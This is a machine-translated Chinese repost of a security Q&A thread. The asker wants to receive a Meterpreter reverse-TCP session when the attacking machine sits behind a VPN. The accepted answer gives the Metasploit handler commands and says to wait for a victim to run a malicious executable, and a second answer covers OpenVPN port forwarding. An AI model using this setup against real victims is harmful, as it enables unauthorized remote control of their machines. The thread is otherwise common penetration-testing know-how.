首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >基于VPN的Meterpreter会话

基于VPN的Meterpreter会话
EN

Security用户
提问于 2016-03-31 13:48:41
回答 2查看 16.3K关注 0票数 5

我有以下情况:

攻击者计算机连接到具有从ISP分配的公共IP的路由器,并启用转发。

受害者机器连接到另一个路由器,(显然)从不同的ISP分配不同的IP。

我想用反向tcp建立一个计量器会话。我使用msfvenom创建有效负载可执行文件,将攻击者路由器的公共IP作为LHOST参数,然后启动侦听器将攻击者机器的本地IP设置为LHOST。

在这里之前没问题。

我试图对连接到自制VPN服务器的攻击者进行同样的操作,但没有成功。有可能这样做吗?

如果是这样的话,我必须在有效负载和侦听器中设置哪些IP地址才能使其正常工作?

EN

回答 2

Security用户

回答已采纳

发布于 2016-03-31 18:22:15

如果您使用的是反向外壳,则需要使用攻击者VPN IP设置LHOST,而不是内部LAN IP。此外,您还需要使用Metasploit本地侦听特定端口,该端口应该设置在LPORT上,并且必须与msfvenom (es )相同。443)。要实现这一点,您可以使用:

代码语言:javascript
复制
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

然后等待受害者打开恶意的可执行文件。

票数 3
EN

Security用户

发布于 2016-03-31 18:14:44

是的,如果您使用openvpn是可能的。你可以建立一个非军事区。Openvpn有能力做到这一点。如果配置了dmz,vpn公共ip可以将端口转发给客户端。您应该将VPN的IP设置为LHOST,而不是将内部客户端ip设置为LHOST。

票数 0
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/119100

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档